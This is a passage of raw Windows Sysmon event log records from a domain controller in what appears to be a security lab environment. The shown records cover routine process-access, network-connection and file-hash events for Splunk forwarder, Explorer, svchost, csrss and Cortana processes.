Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:09.459{266CAFBE-6665-6064-6F01-00000000AE01}6848C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:10.896{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85546686F2F4EE02B176D6A76666883D,SHA256=13379B53A44A17F9FEA04C0E74E68A4FF262C387A826602806D15CC4461216E8,IMPHASH=00000000000000000000000000000000falsetrue 
354300x800000000000000010700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:08.632{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53707-false10.0.1.12-8000- 23542300x800000000000000010702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:11.927{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B4177187C7DC20E0B13765C1C4B0C86,SHA256=12F2849E905A90D40EC2ACEA31DDDFA0508A9519C8570723996382F34F9B4A0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:12.989{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54E34CC4FEC08BD1C27FBB3141D4BC59,SHA256=7422AFA426B9D4B83E3A38A379E4513028F0A8AB07B17E90538FA5729DA7C5A0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:14.458{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:14.458{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:14.458{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:14.458{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:14.458{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:14.458{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:14.036{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D2AB41AF9ED8B320FFC1D112CD3B3DE,SHA256=3C00D1CABE7D37BC504278A9FB550775151952231B73290A3387154880E9F4FE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:14.554{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53709-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x800000000000000010715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:14.554{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53709-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x800000000000000010714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:14.507{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53708-false10.0.1.12-8000- 
23542300x800000000000000010713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:15.208{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=787613594085E9168DAD20C0527D30C9,SHA256=097ADBA32BAAB0BB3C9A0EE45079390FE94C71485C28303B5C30C849982789AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:15.208{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C017D5136C956485970E33C9E559FA1C,SHA256=E1824F4A5093B5942D664824B8B81060EA48E505056C474BDD0FF1A4E9FCD93C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:15.067{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB87FFA1FF8B7C421CE74C26B0A9326C,SHA256=62C56243CE19B163FE5FCE244A3E21AE171AEE5C07D1FF3C69F0A113AF144304,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:16.130{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7598EF64B478EA4831184B98BA3E32A,SHA256=18D068AA3E50BE572B6AA3EFEE13D10ECD5FAD79B462D6C2A71894D5E857FFCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:17.161{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D3950286365F3D2AB85C22A5E378D15,SHA256=BA139DFA92C17B222DD3850E1D12B2F63E3264A06AD5A5604994ACCFF72B6535,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.879{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB86A30F529A3B30186532C84548EB14,SHA256=D66919AC4B9A0CB08B5720224EB975133A49D823010DDCF5E930551A20C1C672,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.817{266CAFBE-646C-6064-1000-00000000AE01}11242204C:\Windows\system32\svchost.exe{266CAFBE-666E-6064-7101-00000000AE01}6632C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.817{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-666E-6064-7101-00000000AE01}6632C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.801{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-666E-6064-7101-00000000AE01}6632C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.801{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-666E-6064-7101-00000000AE01}6632C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.801{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-666E-6064-7101-00000000AE01}6632C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.801{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-666E-6064-7101-00000000AE01}6632C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.786{266CAFBE-64C4-6064-9B00-00000000AE01}49246816C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.onecore.dll+1602f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000010821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.786{266CAFBE-64C4-6064-9B00-00000000AE01}49246816C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.onecore.dll+1717e|C:\Windows\system32\windows.cortana.onecore.dll+15fb7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000010820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.786{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.786{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 23542300x800000000000000010818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.786{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=6A4DB970B26B3E484596A3099347CA52,SHA256=514FEB88EDC46E1004901F56BDEFB9AA65AAA5D68137D6D816374309F8FCD8CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.770{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000010816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.770{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000010815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
